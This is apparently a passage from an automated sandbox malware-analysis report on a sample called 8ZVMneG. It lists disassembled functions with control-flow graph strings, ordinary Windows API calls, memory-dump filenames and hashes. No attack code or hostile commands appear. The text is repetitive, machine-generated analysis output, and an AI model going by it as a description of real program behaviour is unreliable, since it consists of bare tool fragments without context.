                                                                                                                                                                                                                                                                  control_flow_graph 224 ed8e82-ed8e87 225 ed8e89-ed8ea1 224->225 226 ed8eaf-ed8eb8 225->226 227 ed8ea3-ed8ea7 225->227 228 ed8eca 226->228 229 ed8eba-ed8ebd 226->229 227->226 230 ed8ea9-ed8ead 227->230 234 ed8ecc-ed8ed9 GetStdHandle 228->234 232 ed8ebf-ed8ec4 229->232 233 ed8ec6-ed8ec8 229->233 231 ed8f24-ed8f28 230->231 231->225 237 ed8f2e-ed8f31 231->237 232->234 233->234 235 ed8edb-ed8edd 234->235 236 ed8f06-ed8f18 234->236 235->236 238 ed8edf-ed8ee8 GetFileType 235->238 236->231 239 ed8f1a-ed8f1d 236->239 238->236 240 ed8eea-ed8ef3 238->240 239->231 241 ed8efb-ed8efe 240->241 242 ed8ef5-ed8ef9 240->242 241->231 243 ed8f00-ed8f04 241->243 242->231 243->231
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,00ED8D71,00EF1A10), ref: 00ED8ECE
                                                                                                                                                                                                                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00ED8D71,00EF1A10), ref: 00ED8EE0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileHandleType
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3000768030-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2970f508abfb9c1585d6c0dac45bed00b2201913e7bcc20a2f31277573333c0a
                                                                                                                                                                                                                                                                  • Instruction ID: 423498bb7228f15443690f1f2a19a304a082e1b68601f427b268b990dc92dacc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2970f508abfb9c1585d6c0dac45bed00b2201913e7bcc20a2f31277573333c0a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B111B4716047414AC7344B3E8E88622BB95DB92338B38271BE8B6F67F1CB74D987D644
                                                                                                                                                                                                                                                                  Function 00EF5B10 Relevance: 3.0, APIs: 2, Instructions: 48COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32 ref: 00EF5B38
                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32 ref: 00EF5B58
                                                                                                                                                                                                                                                                    • Part of subcall function 00EC1690: std::_Throw_Cpp_error.LIBCPMT ref: 00EC16BD
                                                                                                                                                                                                                                                                    • Part of subcall function 00EC1690: GetCurrentThreadId.KERNEL32 ref: 00EC16CB
                                                                                                                                                                                                                                                                    • Part of subcall function 00EC1690: std::_Throw_Cpp_error.LIBCPMT ref: 00EC16E4
                                                                                                                                                                                                                                                                    • Part of subcall function 00EC1690: std::_Throw_Cpp_error.LIBCPMT ref: 00EC1723
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Cpp_errorThrow_std::_$Module$CurrentFileHandleNameThread
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1246727395-0
                                                                                                                                                                                                                                                                  • Opcode ID: f4c3f31f032bd81b608d0323866bf1574be82b83984b388a7a165b23271fc263
                                                                                                                                                                                                                                                                  • Instruction ID: 4e3f1adef69a66dac408fa00a9b16e34837a9c1ca87984dfe385e02fa8882eb0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4c3f31f032bd81b608d0323866bf1574be82b83984b388a7a165b23271fc263
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F11DAB09042188FCB58EF78DA457EDBBF0AB48300F0045ADD589A7351EA749E88CF82
                                                                                                                                                                                                                                                                  Function 00ED1249 Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00EF1540,0000000C), ref: 00ED125C
                                                                                                                                                                                                                                                                  • ExitThread.KERNEL32 ref: 00ED1263
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1611280651-0
                                                                                                                                                                                                                                                                  • Opcode ID: a40e00d274d96b1cb570209c03d496f967dcf7e4516396265daa78ba2c265190
                                                                                                                                                                                                                                                                  • Instruction ID: 784a6c64d50d3f9e27cd5f33f27627c37822826e88f4ffb6f0a0dba592797b15
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a40e00d274d96b1cb570209c03d496f967dcf7e4516396265daa78ba2c265190
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAF0AF70A40208AFDB04ABB0C90AE7E3BB5EF81750F10558AF401B73A2DB315902DBA1
                                                                                                                                                                                                                                                                  Function 00EF5600 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 279 ef5600-ef564d GetCurrentProcess TerminateProcess call ec8eaa 282 ef5652-ef5657 279->282
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00EF562C
                                                                                                                                                                                                                                                                  • TerminateProcess.KERNELBASE ref: 00EF563F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$CurrentTerminate
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2429186680-0
                                                                                                                                                                                                                                                                  • Opcode ID: d6c89b532d29e9b29bdb707e7dd716b53d9856c6317a58bd26b764276666d7bc
                                                                                                                                                                                                                                                                  • Instruction ID: 933b9541d158656e35c93e2de8074992dc83924d879bb1189704fecfe3a1d5ae
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6c89b532d29e9b29bdb707e7dd716b53d9856c6317a58bd26b764276666d7bc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86F0A031A012089FD748AF78E8596AE7BE4EFC8310F40803DE54EAB240EE349848C781
                                                                                                                                                                                                                                                                  Function 00ED75D3 Relevance: 2.6, APIs: 2, Instructions: 71COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 283 ed75d3-ed75e7 GetLastError 284 ed75e9-ed75f1 call ed7feb 283->284 285 ed7603-ed760d call ed802a 283->285 292 ed75fe 284->292 293 ed75f3-ed75fc 284->293 290 ed760f-ed7611 285->290 291 ed7613-ed761b call ed8700 285->291 294 ed7678-ed7681 SetLastError 290->294 296 ed7620-ed7626 291->296 292->285 293->294 297 ed7688-ed768d call ed411a 294->297 298 ed7683-ed7687 294->298 299 ed7639-ed7647 call ed802a 296->299 300 ed7628-ed7637 call ed802a 296->300 308 ed7649-ed7657 call ed802a 299->308 309 ed7660-ed7675 call ed78e4 call ed7347 299->309 307 ed7658-ed765e call ed7347 300->307 316 ed7677 307->316 308->307 309->316 316->294
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00ED7679
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                  • Opcode ID: 397aad96417030441c34f325e5f028b812b55dee10fc4696346c85d11ac4129c
                                                                                                                                                                                                                                                                  • Instruction ID: cb20e772d9458ac540330d995bab52dae64cf5df2fbcd2fffa5c142c8ed1cf1a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 397aad96417030441c34f325e5f028b812b55dee10fc4696346c85d11ac4129c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D11E33131DA116FA3202BB99D86E3A2288DF507A9B10212BF662B13A1FF91CC1B9550
                                                                                                                                                                                                                                                                  Function 00ECA10F Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 319 eca10f-eca129 320 eca12b-eca12d 319->320 321 eca132-eca13a 319->321 322 eca20b-eca218 call ec8eaa 320->322 323 eca13c-eca146 321->323 324 eca15b-eca15f 321->324 323->324 331 eca148-eca159 323->331 327 eca165-eca176 call eca99f 324->327 328 eca207 324->328 335 eca17e-eca1b2 327->335 336 eca178-eca17c 327->336 330 eca20a 328->330 330->322 334 eca1d4-eca1d6 331->334 334->330 342 eca1d8-eca1e0 335->342 343 eca1b4-eca1b7 335->343 337 eca1c5 call ec9ac0 336->337 340 eca1ca-eca1d1 337->340 340->334 345 eca1f5-eca205 342->345 346 eca1e2-eca1f3 call ed4dca 342->346 343->342 344 eca1b9-eca1bd 343->344 344->328 348 eca1bf-eca1c2 344->348 345->330 346->328 346->345 348->337
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 4763fbc1090eb783ba5978d41c5536b3f5aca7dd4288bce5d9ec584a2b02adae
                                                                                                                                                                                                                                                                  • Instruction ID: 4da5d747b47a65a831026c6dd6f5390a9c31f9669d9004ab715012eda2ab0a5b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4763fbc1090eb783ba5978d41c5536b3f5aca7dd4288bce5d9ec584a2b02adae
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E31937290151EAFCB15DE68C984EE9B7B9BF08328B18122EE551F3290E732E945CB51
                                                                                                                                                                                                                                                                  Function 00ED842D Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a4800bbba03f83e9031ac7fa478cf1eac92a3bcf33f9628628e14c7c691f03d4
                                                                                                                                                                                                                                                                  • Instruction ID: 0831b148edcad4e5bbb78654dd974d3c33e18e15b6db741c3ab5dcccfccebbdd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4800bbba03f83e9031ac7fa478cf1eac92a3bcf33f9628628e14c7c691f03d4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8016D336002265FCB199F69ED41D6B33A5FBC0764321912AFA24FB255DF30D806C750
                                                                                                                                                                                                                                                                  Function 00EC8770 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00EC8825
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Cpp_errorThrow_std::_
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2134207285-0
                                                                                                                                                                                                                                                                  • Opcode ID: d2955eb329fbbce40f9f0f44c6fd04ba85627761f37665d895bf79bbdec7228f
                                                                                                                                                                                                                                                                  • Instruction ID: f3746e3dc0d82822a74d28a25be9dbb5390b661d7f7daa16f8ed9aa39c8912f4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2955eb329fbbce40f9f0f44c6fd04ba85627761f37665d895bf79bbdec7228f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B521A8B4904209DFDB08EF64D651BAEBBF0FF48300F40846EE859AB350DB359A46CB91
                                                                                                                                                                                                                                                                  Function 00EC8B60 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00EC8C0B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Cpp_errorThrow_std::_
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2134207285-0
                                                                                                                                                                                                                                                                  • Opcode ID: 42dd5950fed9cdb3102dfa571f4af143d1626f837496086c5bce9dc75e6bd179
                                                                                                                                                                                                                                                                  • Instruction ID: 2e61c022265b24fc8bc80111ee1f5c8f473357cbfebbfa384e28ba3399403378
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42dd5950fed9cdb3102dfa571f4af143d1626f837496086c5bce9dc75e6bd179
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A21D8B4905209DFDB08EF68C651BAEFBF0BF44300F40846DE449AB350DB359A46CB92
                                                                                                                                                                                                                                                                  Function 00ECA101 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalLeaveSection
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3988221542-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8f421e4b84ad997d4a61e9cf8488dc0d58add259e3eb3bb59453e2e46ac1e8a3
                                                                                                                                                                                                                                                                  • Instruction ID: 6ed9ca4159bc711a1f04b475dd7ce02522734fcbae75c276fa6c6c8f67af2017
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f421e4b84ad997d4a61e9cf8488dc0d58add259e3eb3bb59453e2e46ac1e8a3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3501D67260925A5ACB099A78AB59FE8BB91EF4633CF2C617FD461A8092CA134853D211
                                                                                                                                                                                                                                                                  Function 00ED8700 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,?,?,00ED7620,00000001,00000364,?,00000006,000000FF,?,00ED126E,00EF1540,0000000C), ref: 00ED8741
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
